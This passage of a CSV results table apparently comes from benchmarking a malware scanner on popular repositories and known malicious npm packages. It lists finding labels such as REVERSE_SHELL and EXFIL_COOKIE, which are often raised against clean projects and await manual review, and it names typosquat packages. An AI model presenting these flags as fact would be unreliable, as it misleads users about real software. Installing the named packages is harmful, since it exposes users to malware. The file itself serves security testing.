positive.","200","503","false","3165","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-svelte","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/sveltejs/svelte","b4d1583ae20f3869a88a731d9a265c546c099f66","","","low","completed","true","true","true","low","0","true","","","","","200","8765","false","4396","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-vite","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vitejs/vite","fef682d3f067d534a559faf6fd9baedda2e9f8f1","","","low","completed","true","true","true","low","0","true","","","","","200","2513","false","3870","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-next","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/vercel/next.js","93249ee06d6e0c105b1278412768c8e0816d9936","","","low","completed","false","true","false","high","1","false","BEAVERTAIL_EXFIL | HARDCODED_AWS_KEY | OBF_BASE64_HEAVY | OBF_EVAL | OBFUSCATED_CODE | EXFIL_COOKIE | REVERSE_SHELL | SUSPICIOUS_FILE_ACCESS | CODE_INTEGRITY_ISSUE","critical | critical | medium | high | critical | critical | critical | high | medium | high | critical | critical | critical | high | medium | high | critical | critical | critical | medium | critical | critical | critical | critical | medium | critical | high | critical | critical | medium | medium | medium | medium","high | high | high | high | unspecified | high | high | high | high | high | unspecified | high | high | high | high | high | unspecified | high | high | high | unspecified | high | high | high | high | unspecified | high | unspecified | unspecified | medium | medium | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","200","29628","false","6218","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-nest","reference-clean","reference-clean","User-provided normal-project starter set","https://github.com/nestjs/nest","f2938487c45db149964a8b0efc58a073610dcdf1","","","low","completed","true","true","true","low","0","true","","","","","200","1928","false","3015","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-vscode","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/vscode","af2c64423e7ee5d1030a000c82a0bb774d043351","","","low","completed","false","true","false","high","1","false","OBF_BASE64_HEAVY | CREDENTIAL_THEFT | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | critical | medium | medium | medium | medium | high | medium","high | high | high | high | high | high | unspecified | medium","Manual review required; this result is not yet classified as a false positive.","200","16247","false","4440","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-playwright","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/microsoft/playwright","2670e5cae0239502d053e530da2c675e5aa536aa","","","low","completed","false","true","false","high","1","false","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | DATA_EXFILTRATION | NETWORK_COMMUNICATION","medium | high | high | high | high | high | medium | medium | high","high | unspecified | high | high | unspecified | high | medium | medium | unspecified","Manual review required; this result is not yet classified as a false positive.","200","3047","false","3564","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-cypress","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/cypress-io/cypress","cd8bb88f1080d0ee354e605fadba986b03320828","","","low","completed","true","true","true","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","200","6980","false","4024","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-electron","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/electron/electron","8215b5aa536ec6ae121003bc618bdd825bdbbb0f","","","low","completed","true","true","true","low","0.27","true","DATA_EXFILTRATION","medium | medium | medium","medium | medium | medium","","200","2849","false","4967","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-esbuild","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/evanw/esbuild","6ff1d8b0d8c134e867a397eef39702a223ebef9e","","","low","completed","false","true","false","high","0.49","false","SUSPICIOUS_FILE_ACCESS | DATA_EXFILTRATION","critical | medium","unspecified | medium","Manual review required; this result is not yet classified as a false positive.","200","149","false","8079","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-node","noisy-legitimate","reference-clean","User-provided scanner-hostile starter set","https://github.com/nodejs/node","1314579f8c82ed70b8cbe736fdea1df48624c285","","","low","completed","false","true","false","high","1","false","OBF_NEW_FUNCTION | OBF_EVAL","high | high | high | high","high | high | high | high","Manual review required; this result is not yet classified as a false positive.","200","49533","false","4967","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-hapijs-hapi","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/hapijs/hapi","d4f93d80e6acadb0000f1cf67f9b1b5992e8a8cc","","","low","completed","false","true","false","high","1","false","REVERSE_SHELL | OBF_BASE64_HEAVY | NETWORK_COMMUNICATION","critical | medium | medium | high | high","high | high | high | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","62","12","false","3139","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-reduxjs-redux","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux","5d65348e26635b6ec627b1030732ed38797e88e9","","","low","completed","false","true","false","medium","0.57","false","NETWORK_URL_SHORTENER | DATA_EXFILTRATION","medium | medium | medium | medium | medium","high | high | medium | medium | medium","","200","276","false","6616","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-reduxjs-redux-toolkit","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/reduxjs/redux-toolkit","7b269256424e1d44baf83d7de634d9f53931dda7","","","low","completed","true","true","true","low","0","true","","","","","200","952","false","2976","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-immerjs-immer","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/immerjs/immer","60ca295e1185db80322ef55ec3fb8475cbc960c7","","","low","completed","true","true","true","low","0.15","true","NETWORK_URL_SHORTENER","medium","high","","60","105","false","3051","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-date-fns-date-fns","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/date-fns/date-fns","4098115cf705e3af7f663d8e5b0686e39a9f478a","","","low","completed","false","true","false","high","1","false","OBF_EVAL | SUSPICIOUS_FILE_ACCESS","high | high | high | high | high | high | medium","high | high | high | high | high | high | medium","Manual review required; this result is not yet classified as a false positive.","200","1703","false","3166","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-ramda-ramda","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ramda/ramda","bcb320e60b5d91c958a6b02feb0bd8658d744298","","","low","completed","false","true","false","high","0.4","false","OBFUSCATED_CODE","critical","unspecified","Manual review required; this result is not yet classified as a false positive.","200","513","false","4689","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-sindresorhus-got","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/sindresorhus/got","e3924aa1e53a6ca3eb93a43618ce532442a89b40","","","low","completed","false","true","false","high","1","false","REVERSE_SHELL | NETWORK_COMMUNICATION | HARDCODED_SECRETS","critical | high | high | critical | critical | critical | critical | critical","high | unspecified | unspecified | unspecified | unspecified | unspecified | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","87","40","false","3585","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-socketio-socket-io","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/socketio/socket.io","d2d753fed4435015c2d83fe62e676b44e07fa3f7","","","low","completed","false","true","false","high","1","false","NETWORK_URL_SHORTENER | BACKDOOR_HARDCODED_AUTH | HARDCODED_SECRETS","medium | medium | critical | critical | critical","high | high | high | high | unspecified","Manual review required; this result is not yet classified as a false positive.","200","655","false","3871","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-apollographql-apollo-client","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/apollographql/apollo-client","c843c98a803d7d7f48f4da72080a61d9086dc8ad","","","low","completed","true","true","true","low","0","true","","","","","200","853","false","4975","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-tanstack-query","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/TanStack/query","79d2384db5c8776680d5bfbe9b595618c066248b","","","low","completed","false","true","false","high","0.4","false","HARDCODED_API_KEY","critical","high","Manual review required; this result is not yet classified as a false positive.","200","2151","false","3813","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-testing-library-react-testing-library","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/testing-library/react-testing-library","be9d81d91314c9f0bafaa363f70b409b4b31989c","","","low","completed","true","true","true","low","0","true","","","","","36","31","false","2372","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-prisma-prisma","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prisma/prisma","cda80a4488b7b551c36bf09ca2e8303ef9509da4","","","low","completed","false","true","false","high","0.65","false","TYPOSQUAT_PACKAGE | OBF_EVAL | HARDCODED_DB_CONNECTION","medium | high | high","unspecified | high | high","Manual review required; this result is not yet classified as a false positive.","200","4471","false","4279","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-tailwindlabs-tailwindcss","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tailwindlabs/tailwindcss","35a3e9c5159bea77af0d48f0c8849279211cc7e9","","","low","completed","true","true","true","low","0","true","","","","","200","341","false","3251","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-prettier-prettier","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/prettier/prettier","41a8b99bb8d7d68c00d90d5b8fbaed20511d4cfd","","","low","completed","false","true","false","high","0.75","false","OBF_NEW_FUNCTION","high | high | high","high | high | high","Manual review required; this result is not yet classified as a false positive.","200","9125","false","3199","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-eslint-eslint","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/eslint/eslint","c5963f74bfa82a5b7ccc0607dcdcc695b8c97a31","","","low","completed","true","true","true","low","0.09","true","DATA_EXFILTRATION","medium","medium","","200","2156","false","3847","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"reference-pnpm-pnpm","reference-clean","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pnpm/pnpm","0dd21df7457d2026f411f2c1a09104280b9b16e5","","","low","completed","false","true","false","high","0.4","false","HARDCODED_SECRETS","critical","unspecified","Manual review required; this result is not yet classified as a false positive.","200","4869","false","4116","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-denoland-deno","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/denoland/deno","e5aed78415ded1213794bbf1ebbde1bf5cfa08b4","","","low","completed","false","true","false","high","1","false","OBFUSCATED_CODE | OBF_BASE64_HEAVY | OBF_EVAL | HARDCODED_SECRETS | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","critical | medium | high | medium | critical | critical | high | high | medium","unspecified | high | high | high | unspecified | unspecified | unspecified | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","200","14300","false","11033","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-oven-sh-bun","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/oven-sh/bun","8f1a9540fdff25410506de76e0da2506d260c08f","","","low","completed","false","true","false","high","1","false","OBFUSCATED_CODE | OBF_EVAL | HARDCODED_SECRETS | CODE_INTEGRITY_ISSUE","critical | high | critical | medium","unspecified | high | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","200","17929","false","3913","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-tauri-apps-tauri","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/tauri-apps/tauri","f5347cd70838c027040acb4a66733a2470f20ae4","","","low","completed","false","true","false","high","0.83","false","OBFUSCATED_CODE | SUSPICIOUS_FILE_ACCESS | HARDCODED_SECRETS","high | medium | medium | critical","unspecified | medium | medium | unspecified","Manual review required; this result is not yet classified as a false positive.","133","948","false","2948","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-puppeteer-puppeteer","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/puppeteer/puppeteer","5f5f931a0f2bc64bfb30039c507d763ce044c263","","","low","completed","false","true","false","high","1","false","OBF_EVAL | EXFIL_CLIPBOARD | OBF_SETTIMEOUT_STRING","high | high | high | high | high","high | high | high | high | high","Manual review required; this result is not yet classified as a false positive.","200","2016","false","3480","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-microsoft-typescript","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/microsoft/TypeScript","637d5746b70257028fb95aad32ddec6b26ab0a14","","","low","completed","false","true","false","high","1","false","OBF_BASE64_HEAVY | OBFUSCATED_CODE | OBF_EVAL | OBF_NEW_FUNCTION | NETWORK_COMMUNICATION","medium | medium | medium | medium | medium | high | medium | medium | medium | medium | medium | medium | high | high | high | high | high","high | high | high | high | high | unspecified | high | high | high | high | high | high | high | high | high | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","200","53109","true","10187","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-npm-cli","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/npm/cli","7b1f6c173d17b3bf30e45426f6df39473c6a1163","","","low","completed","false","true","false","high","1","false","HARDCODED_SECRETS","critical | critical | critical","unspecified | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","200","6701","false","3461","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-homebrew-brew","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/Homebrew/brew","76ca8d74e4a180badad438bf245ddfc740d68a8e","","","low","completed","false","true","false","medium","0.59","false","HIDDEN_FILE | SOCIAL_ENGINEERING_SECURITY_BYPASS | SUSPICIOUS_FILE_ACCESS","high | high | medium","unspecified | high | medium","Manual review required; this result is not yet classified as a false positive.","200","2970","false","3130","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-python-cpython","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/python/cpython","1fece4457032382947c7c2a5c9e95dc106ca7a7d","","","low","completed","false","true","false","high","1","false","OBF_BASE64_HEAVY | OBF_NEW_FUNCTION | OBFUSCATED_CODE | OBF_HEX_STRINGS | DATA_EXFILTRATION | NETWORK_COMMUNICATION | CODE_INTEGRITY_ISSUE","medium | high | critical | high | medium | medium | medium | medium | medium | high | medium | medium","high | high | unspecified | unspecified | high | high | high | high | medium | unspecified | medium | unspecified","Manual review required; this result is not yet classified as a false positive.","200","5803","false","8848","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-django-django","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/django/django","bdbda29c3e126754c3ae04ceb5c5d35d49aae01c","","","low","completed","true","true","true","low","0","true","","","","","200","6874","false","3394","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-ansible-ansible","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/ansible/ansible","8d63341579aa1c62024f3bce1a8af3f9a1b22a16","","","low","completed","false","true","false","high","0.9","false","HIDDEN_FILE | NETWORK_COMMUNICATION | HARDCODED_SECRETS","high | high | critical","unspecified | unspecified | unspecified","Manual review required; this result is not yet classified as a false positive.","200","5591","false","4242","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-scrapy-scrapy","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/scrapy/scrapy","c9446931a80e63ea1d77e130ea5581b547e0f51b","","","low","completed","true","true","true","low","0","true","","","","","200","432","false","3348","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-pallets-flask","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/pallets/flask","36e4a824f340fdee7ed50937ba8e7f6bc7d17f81","","","low","completed","true","true","true","low","0","true","","","","","107","129","false","3017","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-rust-lang-rust","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/rust-lang/rust","5503df87342a73d0c29126a7e08dc9c1255c46ad","","","low","completed","false","true","false","high","1","false","OBF_BASE64_HEAVY | SUSPICIOUS_FILE_ACCESS | NETWORK_COMMUNICATION | DATA_EXFILTRATION","medium | medium | medium | high | medium | medium | medium | medium | medium | medium","high | medium | medium | unspecified | medium | medium | medium | medium | medium | medium","Manual review required; this result is not yet classified as a false positive.","200","60050","true","4947","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"noisy-golang-go","noisy-legitimate","reference-clean","Expanded commit-pinned reference corpus","https://github.com/golang/go","03845e30f7b73d1703bd8c21017297f6eecb76d6","","","low","completed","true","true","true","low","0","true","","","","","200","15414","false","3504","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2024-8862","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-8862; report blob cebceb18d12edabb3bf055a6936a367b0614e792","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/bcrypts-js/MAL-2024-8862.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:cebceb18d12edabb3bf055a6936a367b0614e792:7c7ee68d6f6b26b48726c11558dc9206bf998cf9","SUSPICIOUS_DEPENDENCY","high","","completed","false","true","false","low","0.25","true","SUSPICIOUS_DEPENDENCY","high","unspecified","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2024-1377","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2024-1377; report blob c78863fed3a5a3b662b72b05c16b77d9dc153665","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/cors-parser/MAL-2024-1377.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:c78863fed3a5a3b662b72b05c16b77d9dc153665:3e4eb5c422572ea85c1fff43d7e1f202899068b3","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","unspecified","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-19413","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-19413; report blob 84b9fce13d64dd7ec790910850e9fbbbf58cf348","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/electorn/MAL-2025-19413.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:84b9fce13d64dd7ec790910850e9fbbbf58cf348:d511c4332bf47892ca7bf08a3ad5e06ccc7224fb","SUSPICIOUS_DEPENDENCY","high","","completed","false","true","false","low","0.25","true","SUSPICIOUS_DEPENDENCY","high","unspecified","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-20690","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-20690; report blob 2fdd79a99598980c7c4cbaad70833538b602a95c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/flatmap-stream/MAL-2025-20690.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:2fdd79a99598980c7c4cbaad70833538b602a95c:faa25eec2f63ebf17e74b3d3dad492afa2bdc214","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.4","false","SUSPICIOUS_DEPENDENCY","critical","unspecified","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-25502","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-25502; report blob 67e0222164b6b5f6ec72ce58d7a20b430cac4dd2","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/lodahs/MAL-2025-25502.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:67e0222164b6b5f6ec72ce58d7a20b430cac4dd2:5ee45d530dcca44dea28a23994dbcdbecfc63f8e","SUSPICIOUS_DEPENDENCY","high","","completed","false","true","false","medium","0.4","false","SUSPICIOUS_DEPENDENCY | TYPOSQUAT_PACKAGE","high | medium","unspecified | unspecified","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-4275","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-4275; report blob 238dc228cd9cf54efea67c07f9bc7089b15207b4","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axios.js/MAL-2025-4275.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:238dc228cd9cf54efea67c07f9bc7089b15207b4:e015c3138480f5286955833abfb3bea47471688d","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2026-4493","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2026-4493; report blob 366383ef9f8518dfc534b911251a2dbe5ccd3928","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axiosqqq/MAL-2026-4493.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:366383ef9f8518dfc534b911251a2dbe5ccd3928:bb3d39dbc3518a28407d264f2abcf070c3a3657b","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15242","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15242; report blob 5850d1f4f2806fd59eb535b3e4d45beb058bc826","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/axioss/MAL-2025-15242.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:5850d1f4f2806fd59eb535b3e4d45beb058bc826:81363d511fb327ca5616ccfcba7c5393e1a0044c","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0.15","true","TYPOSQUAT_PACKAGE","medium","unspecified","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15281","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15281; report blob e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-laoder/MAL-2025-15281.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:e6a3d9c6a3d214bff2f326a8f1d8ba8ac8c1d472:7ae13db475be04ecc7d2b6fcef3b20c40bbc2e03","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15282","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15282; report blob b23f507de17d8c239290fb1c36a5d9a6d886b92c","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loadre/MAL-2025-15282.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:b23f507de17d8c239290fb1c36a5d9a6d886b92c:cb4b464cf4c2449f6ad3903bd3e62fbe9c7579dd","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15283","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15283; report blob a98eafc3406e034fe14c4e2fe25edc21ee7e9a47","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loqder/MAL-2025-15283.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:a98eafc3406e034fe14c4e2fe25edc21ee7e9a47:b2eee8c6fb943b5b47deffd77c116865d4d2ddee","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15286","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15286; report blob 7d72739e67fda4b48cc77bfcb6c868feafd17567","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-node/MAL-2025-15286.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:7d72739e67fda4b48cc77bfcb6c868feafd17567:9b2980f27303a4070b0e103b0621839940ee9724","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15289","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15289; report blob 283dd8d75b91d4a35c89707bd10115e3d2ff9c69","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-pal/MAL-2025-15289.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:283dd8d75b91d4a35c89707bd10115e3d2ff9c69:55744bedf6294386bdc1eec2313e9b485a77322f","SUSPICIOUS_DEPENDENCY","high","","completed","false","false","false","low","0","true","","","","","1","0","false","1","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" 